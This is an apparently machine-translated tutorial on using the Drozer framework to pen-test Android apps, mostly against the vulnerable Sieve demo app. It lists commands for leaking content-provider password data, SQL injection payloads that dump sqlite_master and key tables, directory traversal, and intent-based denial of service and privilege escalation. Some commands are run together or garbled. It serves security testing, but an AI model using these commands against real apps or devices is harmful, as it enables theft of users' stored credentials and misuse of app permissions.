Use Drozer for Android penetration testing

First, install and start 1.installation

First step: Download Drozer from Http://mwr.to/drozer (Windows Installer)

Step Two: install agent.apk on your Android device

ADB install agent.apk

2.Start

First step: use adb on the PC for port forwarding and forwarding to the port used by Drozer 31415

ADB forward TCP:31415 tcp:31415 

Step two: Turn on the drozer Agent on your Android device

Select Embedded Server-enable

Step three: Open the drozer console on the PC

Second, the test steps

1. Get the package name

Dz> Run App.package.list-f sievecom.mwr.example.sieve

2. Get basic information about your app

Run App.package.info-a Com.mwr.example.sieve

3. Identify the attack surface

Run App.package.attacksurface Com.mwr.example.sieve

4.Activity

(1) Get activity information

Run App.activity.info-a Com.mwr.example.sieve

(2) Activate activity

Run App.activity.start--component com.mwr.example.sievedz> help App.activity.startusage:run App.activity.start [-h] [--action action] [--Category Category][--component Package component] [--data-URI data _uri][--extra TYPE KEY VALUE] [--Flagsflags [flags ...]] [--mimetype mimetype]    

5.Content Provider

(1) get content Provider information

Run App.provider.info-a Com.mwr.example.sieve

(2) Content Providers(data leakage)

Get all the URIs you can access first :

Run Scanner.provider.finduris-a Com.mwr.example.sieve

Get The data for each Uri:

Run App.provider.querycontent://com.mwr.example.sieve.dbcontentprovider/passwords/--vertical 

A vulnerability exists in the query to the data description

(3) Content Providers(SQL injection)

Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "'"  Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--selection "'" 

An error indicates that there is a SQL injection.

List all tables:

Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "* FROM Sqlite_master WHERE type= ' table ';--" 

Get The data in a table (such as Key):

Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "* from Key ;--"

(4) Simultaneous detection of SQL injection and directory traversal

Run Scanner.provider.injection-a com.mwr.example.sieverun scanner.provider.traversal-a com.mwr.example.sieve 

6 Intent component triggering (denial of service, privilege elevation)

There are two kinds of vulnerabilities in using intent to trigger a component, such as denial of service and privilege elevation of a class. Denial of service is less harmful, and more simply affects the quality of the app's service, and elevation of privilege will enable an app that does not have that permission to trigger an app with that permission through intent, which can help it complete its ultra vires behavior.

1. View the exposed broadcast component information:

Run app.broadcast.info-a com.name gets broadcast receivers information run App.broadcast.send--component package name-- Action Android.intent.action.XXX 

2. Attempt to deny service attack detection, send incomplete intent (empty action or empty extras) to broadcast component:

Run App.broadcast.send sends broadcast receiver via intent

(1) Empty action

Run App.broadcast.send--Component Package name Receivernamerun app.broadcast.send--component package name Receivername

(2) Empty extras

Run App.broadcast.send--action Android.intent.action.XXX

3. Try Permission Elevation

Elevation of privilege is very similar to denial of service, except that it becomes a intent that constructs more complete and satisfies the program logic. Because activity is generally more relevant than user interaction, intent-based permissions elevate more for broadcast receiver and service. Drozer-related privilege promotion tool, can refer to the Intentfuzzer, which combines drozer and hook technology, using feedback strategy to fuzzing. The following is just a list of the commands Drozer sends intent:

(1) Get service details

Run App.service.info-a com.mwr.example.sieve do not use Drozer to start Serviceam startservice–n package name/service name

(2) Privilege elevation

Run App.service.start--action com.test.vulnerability.SEND_SMS--extra string dest 11111--extra string text 1111--extra String OP send_sms

7. File operation

List globally writable/readable files in the specified file path

Run Scanner.misc.writablefiles--privileged/data/data/com.sina.weiborun scanner.misc.readablefiles-- privileged/data/data/com.sina.weiborun app.broadcast.send--component package name--action Android.intent.action.XXX 

8. Other Modules

Shell.start Open an interactive shelltools.file.upload/tools.file.download upload/ download file to device Tools.setup.busybox/ TOOLS.SETUP.MINIMALSU installing the available binaries

Use Drozer for Android penetration testing